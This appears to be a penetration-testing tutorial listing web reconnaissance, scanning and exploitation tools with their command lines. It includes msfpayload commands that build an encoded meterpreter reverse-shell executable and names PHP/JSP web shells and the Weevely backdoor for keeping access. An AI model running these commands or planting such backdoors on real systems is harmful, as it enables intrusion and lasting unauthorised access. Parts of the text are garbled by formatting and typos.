Web Analysis, Vulnerability Assessment and Exploitation

CMS Identification

  •  BlindElephant is a python based tool for fingerprinting the web applications. This tool basically attempts to discover the version used by comparing the static files at certain known locations against the hashes which are pre-computed for the versions of those files
  • root@root:/pentest/web/blindelephant/src/blindelephant#  python BlindElephant.py [options] url appName                                                        
     BlindElephant %E2%80%93 Web Application Fingerprinting                                                                                                                                       CMS-Explorer
  • CMS-explorer is web application fingerprinting tool (written in perl) which can be used to identify the type of cms used and hence, perform the attack according to the information. There are few advantages in this tool, such as checking for any vulnerability from OSVDB for the particular plugin or CMS detected, updating the list of WP, Drupal, verbosity, looking into themes, and so forth, all of which gives the pentester a lot of information for performing the PT.
root@root:/pentest/web/cms-explorer# python cms-explorer.pl -url target -type type [options]                                                                                         
For Wordpress Site
./cms-explorer.pl -url http://example.com –type wordpress

For Drupal Site

./cms-explorer.pl -url http://example.com -type drupal
  • This tool has over 900 plugins for scanning purposes, supporting proxy (including TOR), can defined with ip ranges similar to NMAP, fuzzing matching, and so forth 
  • root@root:/pentest/web/whatweb# ./whatweb target.com                           

IDS-IPS Detection:                                                                                                               


  • Waffit is a web application firewall detection tool.WAFs are usually easy to detect and they can be bypassed by encoding the attack parameter                /pentest/web/waffit/python wafw00f.py http://www.target.com/                 
wafw00f-03                                                                                                                               UA-Tester
  • This tool is designed to automatically check a given URL using a list of standard and non-standard User Agent strings provided by the user (1 per line).The results of these checks are then reported to the user for further manual analysis where required. Gathered data includes Response Codes, resulting URL in the case of a 30x response, MD5 and length of response body, and select Server headers.\
  • /pentest/enumeration/web/ua-tester# ./UATester.py -u www.example.com -f ./useragentlist.txt -v
    Open Source Analysis:
  1.  GHDB(Google Hacking Database)
  2.  Xssed
  3.  Revhosts
 Web Crawler:
  • Webshag have cli and gui for crawling the webs
  • /pentest/enumeration/web/webshag# webshag_cli.py [-U | [options] target(s)]

Vulnerability Assessment And Exploitation                                                                                                                                                                                  
  •  Joomla! Vulnerability Scanner
  •  /pentest/web/scanners/joomscan# ./joomscan.pl -u victim.com                   
  •  SqlMap is another good tool in the vulnerability assessment category. This tool can test whether the target url is SQL vulnerable or not. Below is the example, where the highlighted text tells us that the parameter “newId” is vulnerable
  • ./sqlmap.py –u target.com -f

  • fimap is a python- based tool which can be used to find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
  • fimap -u http://www.example.com/index.php?inc=index.php

  • Xsser is an automatic -framework- to detect, exploit and report XSS vulnerabilities. It comes with options for bypassing the filters and other mode of injection 
  • ./XSSer.py -u "http://www.target.com" -g "Search.php?tfSearch="–referer"666.666.666.666″–user-agent"correctaudit" 

  • theHarvester tool is used for gathering user names, their email accounts, hostnames/subdomains from public resources (like, for example, google, bing, etc.). This tool again helps the pentester during the initial stage of VA/PT. It can be found in the “Web open source assessment ” option under web vulnerability assessment
  • ./theHaervester.py –ld [target domain] –d [ data source]

  • It can be used to gather a range of intelligence about the target devices which are connected to the internet. We can, for example, search to see if any network devices like routers, Voip, Printers, cams etc. are in place. To search if any service is running in the domain, the syntax would be:
  • Syntax: Hostname:target.com port:80,21,22
  • W3af is auditing and web application attack tool. It’s basically divided into various modules like attack, audit, exploit, discovery, evasion, brute force, and mangle, all of which can be used accordingly. These modules in w3af comes with various sub modules like, for example, we can select sqli option in Audit module, assuming that we need to perform a particular type of auditing.

  • Weevely is a stealthy PHP backdoor, designed to stay beneath the radar. It provides a telnet-like connection, using a dynamic probe of system like functions to bypass PHP security restrictions. Weevely seeks functions like system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()), using the functions enabled on a remote server. The below code is a sample code of the backdoor created by the weevely
  • Weevely.py –g –o filename –p password

  • These are useful in various situations, such as if the web application has a vulnerability (like file upload) or any others that can help us to upload the backdoors. Depending on the website type (for example, if the website is coded in php), then use the php based backdoors. The following web shells available are
  • simple-backdoor.php
  • php-backdoor.php
  • jsp-reverse.jsp
  • cmdjsp.jsp
  • cmd-asp-5.1.asp
  • cmdasp.aspx
  • perlcmd.cgi                                                                                                      
  • cfexec.cfm

  •  Metasploit can be used to create backdoors which can then be used for maintaining access in the target server. This can be done with the help of msfpayload. The steps for creating backdoor in msfpayload are as follows
  • msf > msfpayload windows/meterpreter/reverse_tcp
  • msf > msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=4444 R
  • msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R| msfencode –e x86/shikata_ga_nai -c 5–t exe >> anonymous.exe